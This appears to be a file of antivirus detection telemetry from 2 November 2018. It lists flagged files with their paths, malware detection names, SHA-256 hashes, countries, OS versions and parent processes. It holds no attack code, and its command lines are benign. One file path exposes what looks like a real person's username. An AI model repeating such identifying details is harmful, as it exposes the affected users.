  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T20:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='damege_ga.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\DAMEGE_Ga\\DAMEGE_Ga.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T21:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wysiwygarea.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\plugins\\wysiwygarea\\wysiwygarea.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe16_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T09:09:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8073104\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1947844\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\warcraft-iii-the-frozen-throne_3227721995.exe', parentsize=2323968, timestamp='2018-11-02T12:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v0odf6ppq.exe', filepath='C:\\Program Files\\V0ODF6PPQX\\V0ODF6PPQ.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6e3fa11b6388759a0ab94652d9e88e699cb185619b32309ee761e3b849217391', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\6E3FA11B6388759A0AB94652D9E88E699CB185619B32309EE761E3B849217391', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='6e3fa11b6388759a0ab94652d9e88e699cb185619b32309ee761e3b849217391', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:02:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105204-2e41a2ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-105149-2BB29E06\\AVSCAN-20181102-105204-2E41A2AB', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:52:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-08-03-29.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T07:13:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T07:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155825-e302d5d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155825-E302D5D3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46AD39EA3436E1A73207968F8D137F6078072924091B2ECD1EC328687B7E9DE5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:46:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161756-61c8ce6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161756-61C8CE6C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164413-a954ed64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16b8ee34\\AVSCAN-20181102-164232-9EAAC214\\AVSCAN-20181102-164413-A954ED64', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081956-b2af4eeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-081956-B2AF4EEB', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='2267612530b04bf0a206159a44bc29f3bdc85a5c65e2cf41a4d1769297e071ad', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194343-59b37cd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194343-59B37CD2', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:43:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164427-aacde620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16b8ee34\\AVSCAN-20181102-164232-9EAAC214\\AVSCAN-20181102-164427-AACDE620', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5e3f741a955eabc5d14a2098fd3e3b465880a042', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5e3f741a955eabc5d14a2098fd3e3b465880a042', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='22a3ca2013a1984d94751d00e2b1fd912028aa6c1b293e58ca16b1e315d750dd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120451-2ce83bae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120451-2CE83BAE', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T234003-00693/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054203-ff28bb0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054203-FF28BB0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:11:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061313-59ee0fd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061313-59EE0FD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211821-b6488398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_33b67271\\AVSCAN-20181102-211240-8B529882\\AVSCAN-20181102-211821-B6488398', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052251-508cda0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052251-508CDA0E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='concerth.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\CONCERTH\\CONCERTH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:14:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131948-f248b6f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131948-F248B6F8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:22:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052851-270b6793', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052851-270B6793', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:50Z'), dt=datetime.date(2018, 11, 2)),
